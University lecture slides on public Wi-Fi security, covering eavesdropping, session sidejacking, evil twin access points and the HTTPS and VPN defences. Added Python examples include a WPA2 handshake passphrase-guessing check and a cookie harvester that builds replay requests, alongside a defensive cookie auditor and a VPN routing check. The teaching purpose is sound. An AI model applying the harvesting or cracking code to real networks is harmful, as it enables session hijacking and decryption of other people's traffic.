Accessing Public Wi-Fi: Security Issues Sankar Roy Department of Computing and Information Sciences Kansas State University
Acknowledgement: In preparing the presentation slides and the demo, I received help from Professor Simon Ou, Professor Gurdip Singh, Professor Eugene Vasserman, Alex Bardas and Fengguo Wei.
What is public Wi-Fi? A public Wi-Fi network provides a wireless access point (AP) through which your laptop or smartphone can connect to the Internet. Wi-Fi hotspots are available in coffee shops, at airports, on the KSU campus, in public libraries, etc.
More about a Public Wi-Fi Hotspot Note: Wi-Fi is a particular wireless communication protocol (its technical name is IEEE 802.11). On a public hotspot the communication is open in nature, i.e. any computer with a Wi-Fi antenna in range can communicate with the Access Point (AP), and no key is needed to join the network or to read the frames in the air. [Diagram: client, AP, modem, Internet]
Some Issues of the Public Wi-Fi Wireless communication is essentially broadcast: every frame is transmitted over the air on a shared channel. – A neighboring attacker whose wireless card is put into monitor mode can sniff (eavesdrop on) all the data transmitted to and from the AP, without ever joining the network. [Diagram: AP with several clients in range, one of them the attacker]
More Issues of the Public Wi-Fi Why is no encryption employed in a public Wi-Fi? – It becomes complex from the admin's perspective. – It hurts the current plug-and-play experience. – Encryption does not help much if everybody shares the password: with WPA2-Personal every client derives its keys from the same passphrase, so anyone who knows the passphrase and captures a victim's 4-way handshake (which is sent in the clear) can derive that victim's session key and decrypt its traffic. Why can't you use a secure Wi-Fi protocol yourself? – The network admin has to make the protocol available. – You (the user) do not have admin access to the AP.
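The last bullet deserves a worked illustration. The following Python block is an added example written for this page, not part of the original slides: it reproduces the standard WPA2-Personal key derivation (PBKDF2 for the PMK, the IEEE 802.11i PRF for the PTK, HMAC-SHA1 for the handshake MIC) on a constructed SSID, passphrase and handshake (the MAC addresses, nonces and EAPOL body are made up). It shows that whoever holds the shared passphrase, or guesses it, derives exactly the client's session keys from values that are broadcast in the clear, and that the handshake MIC lets them confirm a guess offline.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    Every client on the hotspot computes this same value from the same passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def ieee80211_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenation of HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
             anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key for CCMP, 48 bytes = KCK(16) | KEK(16) | TK(16).
    Besides the PMK it needs only the MAC addresses and the two nonces, all of which
    are transmitted unencrypted in the 4-way handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return ieee80211_prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


# Constructed handshake as an eavesdropper would record it (all of this is sent in the clear).
SSID = "CoffeeShopWiFi"                                # made-up network name
SNIFFED_HANDSHAKE = {
    "ap_mac": bytes.fromhex("001122334455"),       # made-up AP address
    "client_mac": bytes.fromhex("66778899aabb"),   # made-up victim address
    "anonce": bytes(range(32)),                    # made-up AP nonce
    "snonce": bytes(range(32, 64)),                # made-up client nonce
}
EAPOL_MSG2_MIC_ZEROED = b"\x01\x03\x00\x75\x02\x01\x0a" + bytes(110)  # made-up message 2 body


def client_session_keys(passphrase: str, ssid: str, handshake: dict) -> dict:
    """What the victim's own Wi-Fi driver computes when it joins the network."""
    ptk = wpa2_ptk(wpa2_pmk(passphrase, ssid), **handshake)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def passphrase_matches_handshake(candidate: str, ssid: str, handshake: dict,
                                 eapol_msg2_mic_zeroed: bytes, observed_mic: bytes) -> bool:
    """Offline check available to anyone in radio range: derive the PTK from a candidate
    passphrase and recompute the MIC the client put on handshake message 2."""
    keys = client_session_keys(candidate, ssid, handshake)
    return hmac.compare_digest(eapol_mic(keys["kck"], eapol_msg2_mic_zeroed), observed_mic)


if __name__ == "__main__":
    victim = client_session_keys("latte4ever", SSID, SNIFFED_HANDSHAKE)
    mic_on_air = eapol_mic(victim["kck"], EAPOL_MSG2_MIC_ZEROED)
    # A neighbor who was told the same passphrase ends up with the victim's traffic key.
    neighbor = client_session_keys("latte4ever", SSID, SNIFFED_HANDSHAKE)
    print("neighbor holds victim's TK:", neighbor["tk"] == victim["tk"])
    print("guess 'password' fits:", passphrase_matches_handshake(
        "password", SSID, SNIFFED_HANDSHAKE, EAPOL_MSG2_MIC_ZEROED, mic_on_air))
```

The TK is the key that actually encrypts the victim's data frames, so once a neighbor has it the "encrypted" hotspot is no better than an open one for that victim; and because the MIC check needs nothing but sniffed bytes, a weak shared passphrase can be guessed offline at PBKDF2 speed.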
Attack 1: Eavesdrop Communication The attacker may be able to mine secret information (e.g. a user's emails, passwords, banking details, etc.) from the sniffed communication; everything carried by a plaintext protocol (HTTP, and unencrypted POP/IMAP/SMTP) is readable as-is. Available attack tools: AirPcap (a USB capture adapter), Wireshark, driftnet, urlsnarf, etc.
Background Knowledge for Attack 2 In some portals (e.g. Yahoo mail at the time of this presentation) the web session switches back to HTTP after a successful (HTTPS) login. The HTTP session is then authenticated only by a cookie. What is a cookie? – a login receipt containing the web session ID – The server identifies/authenticates the client's session by the cookie ID, so whoever presents the cookie is treated as the logged-in user. Problem: the client's cookie can be stolen – (example) when the adversary does packet sniffing on the Wi-Fi network where the client's machine is. Outcome: the HTTP session can be hijacked (also called sidejacked).
Attack 2: Sidejacking Web Sessions Now the attacker can impersonate the user, e.g. on LinkedIn or Yahoo email, etc. Attack tools: Firesheep, Droidsheep, etc. (1) After login, the victim sends requests to the web application using a cookie for authentication. (2) Because the requests are sent over HTTP, an adversary can eavesdrop on them and capture the cookie. (3) The adversary sends its own requests carrying this cookie and thereby hijacks the victim's session; no password is needed. Acknowledgement: One-Time Cookies, GaTech.
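To make steps (1) to (3) concrete, here is an added Python example; it is not from the slides and is not the code of Firesheep or Droidsheep, though it does in miniature what those tools automate. The captured payloads are constructed: two plaintext HTTP requests carrying session cookies, one TLS record, and one cookie-less request; the host names are example domains, not the real sites.

```python
import re
from typing import Dict, List, Optional, Tuple

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/1\.[01]$")

# Constructed capture: each entry is the TCP payload of one sniffed segment.
CAPTURED_PAYLOADS: List[bytes] = [
    b"GET /inbox HTTP/1.1\r\nHost: mail.example.com\r\n"
    b"Cookie: Y=v=1&n=abc; T=z=123; SID=9f2c7e\r\nUser-Agent: demo\r\n\r\n",
    b"GET /feed HTTP/1.1\r\nHost: social.example.org\r\nCookie: li_at=AQEDdemo\r\n\r\n",
    # A TLS 1.2 application-data record: ciphertext, nothing for the sniffer to harvest.
    b"\x17\x03\x03\x00\x20" + bytes(32),
    b"GET /logo.png HTTP/1.1\r\nHost: cdn.example.net\r\n\r\n",   # no cookie at all
]


def parse_http_request(payload: bytes) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Return (host, path, cookies) for a plaintext HTTP request, or None for anything else."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, _body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    host = headers.get("host")
    if not host:
        return None
    cookies: Dict[str, str] = {}
    for pair in headers.get("cookie", "").split(";"):
        name, sep, value = pair.strip().partition("=")   # first '=' only: values may contain '='
        if sep and name:
            cookies[name] = value
    return host, match.group(2), cookies


def harvest_sessions(payloads: List[bytes]) -> Dict[str, Dict[str, str]]:
    """Step (2): collect every cookie that crossed the air in the clear, keyed by host."""
    sessions: Dict[str, Dict[str, str]] = {}
    for payload in payloads:
        parsed = parse_http_request(payload)
        if parsed is None:
            continue                      # TLS, non-HTTP, or malformed: nothing to take
        host, _path, cookies = parsed
        if cookies:
            sessions.setdefault(host, {}).update(cookies)
    return sessions


def replay_request(host: str, path: str, cookies: Dict[str, str]) -> bytes:
    """Step (3): the request the attacker sends to the site, reusing the stolen cookie.
    The server cannot tell it from the victim's own request."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n".encode()


if __name__ == "__main__":
    for host, cookies in harvest_sessions(CAPTURED_PAYLOADS).items():
        print(host, "->", sorted(cookies))
```

Only the two plaintext requests yield sessions; the TLS record is skipped because the sniffer never sees a request line inside it, which is the whole basis of Solution 1 later in these slides.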
Attack 3: Evil Twin It is basically a man-in-the-middle attack. It can be launched with tools such as HermesAP and OpenAP. The attacker sets up a fake AP that advertises the same network name (SSID) as the legitimate hotspot; the user's device associates with the fake AP (an open network is identified by its SSID alone, and devices often pick the stronger signal), so all of the user's traffic is relayed through the attacker, who can read or modify it. [Diagram: user node connected to the attacker's fake AP instead of the real AP]
Firesheep: One Web Session Hijacking Tool The attack scenario: – An innocent user, Alice, accesses her Yahoo email or LinkedIn account using a public Wi-Fi hotspot (e.g. at an airport). – A neighboring attacker, Mallory (M), uses a Firefox add-on (Firesheep) on a laptop and sniffs Alice's communication. – Firesheep automatically grabs the cookie of each of Alice's insecure web sessions (i.e. HTTP sessions). – With those cookies, Firesheep hijacks Alice's web sessions with a single click.
Insecure Web Portal Examples At the time of this presentation, Yahoo email switched to an HTTP connection after login, i.e. the secure (HTTPS) connection was no longer used. Facebook had the same problem if its HTTP version was used.
How the Firesheep Add-on Looks in Firefox (screenshot) Acknowledgement: Firesheep creator, Eric Butler
Attacker Browsing Hijacked Sessions (screenshot) Acknowledgement: Firesheep creator, Eric Butler
A Demo: Web Session Hijacking We will use the attack tool called Droidsheep, which runs on an Android tablet. The attack scenario: – Alice accesses her Yahoo email or LinkedIn account at a public Wi-Fi hotspot. – A neighboring attacker, Mallory (M), is present with an Android tablet running Droidsheep. – Droidsheep automatically grabs the cookie of each of Alice's insecure web sessions and shows the list of sessions. – Mallory can now hijack any of Alice's web sessions just by tapping the entry in the list on the tablet screen.
How to Counter the Attacks: the Basic Idea The user Alice establishes a secure (authenticated and encrypted) communication channel with the remote end (R) of the communication (e.g. email server, bank server, etc.). The communication between Alice and R is encrypted end to end. The attacker Mallory (M) cannot decrypt Alice's data by sniffing, so M cannot launch the sidejacking attack; an Evil Twin that relays the traffic sees only ciphertext and cannot modify it without breaking the channel, provided Alice's software verifies R's certificate and she does not click through certificate warnings. [Diagram: a Wi-Fi hotspot with user Alice, attacker Mallory and the AP; secure communication channel from Alice to R, the email server]
Solution 1: Browse Secure Web Only We can avoid the above attacks if we access only HTTPS-enabled web sites (e.g. Gmail but, at the time, not Yahoo email). Many web portals (e.g. Facebook, Twitter) provide both HTTPS and HTTP options; you have to choose the HTTPS option. Caveat: choosing HTTPS only helps if the site marks its session cookie with the Secure attribute; otherwise the browser will still attach the cookie to any http:// request to that site (e.g. a bookmarked link or an embedded image), and it can be sniffed just the same. We discussed how to use HTTPS web browsing in the previous class.
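As an added example, not part of the original slides, the following Python block checks the caveat above against a server's response headers, the way a site operator (or a curious user looking at the browser's network panel) would. The responses are constructed: one site sets its session cookie without Secure (the Yahoo-style mistake), the other sets Secure and HttpOnly and sends an HSTS header. The header names and attributes are the standard ones; the cookie names and domains are made up.

```python
from typing import Dict, List, Tuple

Header = Tuple[str, str]

# Constructed responses: (header name, header value) pairs as a browser would receive them.
SAMPLE_RESPONSES: Dict[str, List[Header]] = {
    "https://mail.example.com/login": [
        ("Content-Type", "text/html"),
        ("Set-Cookie", "SID=9f2c7e; Path=/; Domain=.example.com"),          # no Secure flag
        ("Set-Cookie", "csrf=31ab; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ],
    "https://social.example.org/login": [
        ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
        ("Set-Cookie", "li_at=AQEDdemo; Path=/; Secure; HttpOnly"),
    ],
}


def parse_set_cookie(value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lowercase: val})."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        if key.strip():
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), cookie_value, attrs


def sidejackable_cookies(headers: List[Header]) -> List[str]:
    """Names of cookies the browser would send over plain HTTP, i.e. what Firesheep can grab."""
    names = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookie_name, _, attrs = parse_set_cookie(value)
            if "secure" not in attrs:
                names.append(cookie_name)
    return names


def audit_response(headers: List[Header]) -> List[str]:
    """Findings relevant to public Wi-Fi: cookies without Secure/HttpOnly, and a missing HSTS
    header (without HSTS the browser still follows http:// links and bookmarks to the site)."""
    findings: List[str] = []
    if not any(n.lower() == "strict-transport-security" for n, _ in headers):
        findings.append("no Strict-Transport-Security header: http:// links to this site "
                        "will still be requested in the clear")
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie_name, _, attrs = parse_set_cookie(value)
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name} lacks Secure: sent with any http:// "
                            "request, so it is sidejackable even if the user chose HTTPS")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} lacks HttpOnly: readable by injected script")
    return findings


if __name__ == "__main__":
    for url, headers in SAMPLE_RESPONSES.items():
        print(url)
        for finding in audit_response(headers) or ["ok"]:
            print("  -", finding)
```

The first response is exactly the failure mode behind Attack 2: the login happened over HTTPS, but the SID cookie it set will ride along on the next http:// request to any host under example.com.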
Choose Secure Browsing in Facebook Fortunately, now the default option is HTTPS
Choose Secure Browsing in Twitter Fortunately, now the default option is HTTPS
Solution 2: VPN (Virtual Private Network) Alice uses a VPN to create a secure tunnel between her machine and the remote target network (e.g. KSU). Alice's machine needs a VPN client; the target network needs a VPN server, e.g. vpn.net.k-state.edu for KSU. [Diagram: a Wi-Fi hotspot with user Alice, attacker Mallory and the AP; VPN tunnel from Alice across the Internet to S, the VPN server in the KSU network, and from there to R, the target server]
General Scenario: Multiple Target Servers Caution: a VPN in split mode (split tunneling) does not redirect your communication with all servers (e.g. the Yahoo email server) through the VPN server. In split mode, only the traffic destined for the VPN server's network is protected from the attacker M at the public Wi-Fi hotspot; everything else still leaves your machine over the Wi-Fi in whatever form the application sends it. [Diagram: Alice with a split-mode VPN at a hotspot; VPN traffic to R1, a target server in the KSU network (e.g. KSU email); regular, unprotected traffic to R2, a target server elsewhere (e.g. Yahoo)]
General Scenario: Multiple Target Servers A VPN in full mode (full tunneling) redirects your communication with all servers (including the Yahoo email server) through the VPN server. In full mode, all the traffic to all target servers is protected from the attacker M at the public Wi-Fi hotspot, and to the target servers Alice appears to be at KSU, since her traffic emerges from the KSU VPN server. [Diagram: Alice with a full-mode VPN at a hotspot; VPN traffic to both R1 (e.g. KSU email) and R2 (e.g. Yahoo) via the KSU VPN server]
Setting up a VPN connection to KSU Install the Cisco VPN client on your machine from the ITS website (www.ksu.edu/its/security/vpn). Connect the VPN client to the KSU VPN server by providing your KSU eID and password. In both the full and split VPN options: – The VPN tunnel encrypts your traffic between your computer and the VPN server, which is the only part the hotspot attacker can see. – But the traffic between the VPN server and the target server will NOT be encrypted by the VPN, unless you are using SSL/TLS-enabled applications (e.g. HTTPS); the VPN moves your trust from the hotspot to the VPN operator and the networks beyond it rather than removing the need for it.
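The difference between split and full mode is ultimately a routing-table question, so here is an added Python example (not from the slides) that decides, for each destination, whether its packets leave the laptop through the VPN's tunnel interface or directly over the hotspot's wireless interface. The two route tables and all addresses are constructed from RFC 5737 documentation ranges; they are not KSU's or Yahoo's real prefixes, and the interface names tun0 and wlan0 are an assumption.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple

Route = Tuple[str, str]   # (destination prefix, egress interface)

# Constructed addresses (RFC 5737 documentation ranges, not any real network).
HOTSPOT_LAN = "192.0.2.0/24"        # the coffee-shop / airport Wi-Fi
VPN_SERVER_IP = "203.0.113.10"      # public address of the VPN server
CAMPUS_NET = "198.51.100.0/24"      # the network behind the VPN server ("the KSU network")

SPLIT_TUNNEL: List[Route] = [
    ("0.0.0.0/0", "wlan0"),           # default route still points at the hotspot AP
    (HOTSPOT_LAN, "wlan0"),
    (CAMPUS_NET, "tun0"),             # only campus prefixes are sent into the tunnel
]
FULL_TUNNEL: List[Route] = [
    ("0.0.0.0/0", "tun0"),            # everything goes into the tunnel ...
    (HOTSPOT_LAN, "wlan0"),
    (VPN_SERVER_IP + "/32", "wlan0"), # ... except the encrypted tunnel packets themselves
]


def egress_interface(routes: List[Route], dst: str) -> Optional[str]:
    """Longest-prefix match over the table, as the kernel's route lookup does."""
    addr = ipaddress.ip_address(dst)
    best: Optional[Tuple[int, str]] = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0]):
            best = (net.prefixlen, iface)
    return None if best is None else best[1]


def hidden_from_hotspot_sniffer(routes: List[Route], dst: str, vpn_iface: str = "tun0") -> bool:
    """True if application traffic to dst is wrapped in the tunnel before it reaches the air;
    False if it goes out over the Wi-Fi exactly as the application produced it."""
    return egress_interface(routes, dst) == vpn_iface


def exposure_report(routes: List[Route], targets: Dict[str, str]) -> Dict[str, bool]:
    """For each named target, whether its traffic is protected against the hotspot attacker."""
    return {name: hidden_from_hotspot_sniffer(routes, ip) for name, ip in targets.items()}


if __name__ == "__main__":
    targets = {"campus mail (R1)": "198.51.100.25", "webmail elsewhere (R2)": "203.0.113.50"}
    print("split mode:", exposure_report(SPLIT_TUNNEL, targets))
    print("full mode: ", exposure_report(FULL_TUNNEL, targets))
    print("tunnel packets themselves leave via:", egress_interface(FULL_TUNNEL, VPN_SERVER_IP))
```

On a real machine the same check is a matter of reading the routing table (ip route on Linux, netstat -rn on macOS, route print on Windows) and looking at which interface the default route uses while the VPN is up; the host route to the VPN server over wlan0 is expected in full mode, since those packets are the encrypted tunnel.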
Managing Common Wi-Fi Settings Your laptop (or smartphone) may connect automatically to a public Wi-Fi network if you have used the same network before. The same can also happen if you have used a different network with the same name (SSID) before, because an open network is identified by its SSID alone; this is exactly what an Evil Twin relies on. How to avoid it: change the default wireless network access policy of your laptop or smartphone so that it asks before joining, and forget public networks you no longer need.
Similar Attacks to a Wired Network? A wired Ethernet network can be eavesdropped on too. – If it is a network with a hub, then it is a broadcast channel like a Wi-Fi network, so sniffing is easy. – If it is a network with a switch, then the attacker needs an additional step (e.g. ARP spoofing, to redirect the victim's traffic through the attacker's machine) before being able to sniff. So similar attacks can be launched in a wired network where users access the Internet via Ethernet cables in a public place. Note: this even applies to cable Internet connections at home.
Summary We discussed common security threats of using a public Wi-Fi hotspot. We presented a few standard countermeasures to mitigate the risks. Reminder: – the next homework is due before the next class (1pm on February 14) – the next class will be held in Room 127